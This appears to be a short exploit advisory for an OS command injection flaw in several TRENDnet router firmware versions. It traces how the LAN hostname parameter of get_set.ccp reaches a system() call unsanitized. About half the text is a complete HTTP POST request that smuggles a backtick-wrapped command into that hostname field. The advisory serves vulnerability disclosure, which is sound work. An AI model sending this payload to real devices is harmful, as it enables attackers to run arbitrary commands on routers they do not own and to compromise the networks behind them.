Exploit Author: [email protected]

Vender: TRENDNet

Firmware version: TEW-651BR 2.04B1, TEW-652BRP 3.04b01, and TEW-652BRU 1.00b12

When processing 'get_set.ccp' with LAN configuration POST request through web service. 'lanHostCfg_HostName_1.1.1.0.0' parameter can trigger OS command injection vulnerability.

The string of the 'lanHostCfg_HostName_1.1.1.0.0' parameter is sent to the 'apLanOpFunc', 'routerLanOpFunc' functions in ncc binary without any sanitization.

In the functions '_system("hostname %s",(int)data + 0x38);' called while '(int)data + 0x38' is "`cmd`".

With OS command injection vulnerability, an attacker can execute any command of firmware.

POST /get_set.ccp HTTP/1.1

ccp_act=set&
ccpSubEvent=CCP_SUB_LAN&
nextPage=lan.htm&
old_ip=192.168.10.1&
old_mask=255.255.255.0&
new_ip=192.168.10.1&
new_mask=255.255.255.0&
igd_DeviceMode_1.0.0.0.0=0&
lanHostCfg_HostName_1.1.1.0.0=`cmd`&
lanHostCfg_IPAddress_1.1.1.0.0=192.168.10.1&
lanHostCfg_SubnetMask_1.1.1.0.0=255.255.255.0&
lanHostCfg_DHCPServerEnable_1.1.1.0.0=1&
lanHostCfg_MinAddress_1.1.1.0.0=192.168.10.101&
lanHostCfg_MaxAddress_1.1.1.0.0=192.168.10.199&
lanHostCfg_DomainName_1.1.1.0.0=&
lanHostCfg_DHCPLeaseTime_1.1.1.0.0=10080&
lanHostCfg_StaticDHCPEnable_1.1.1.0.0=1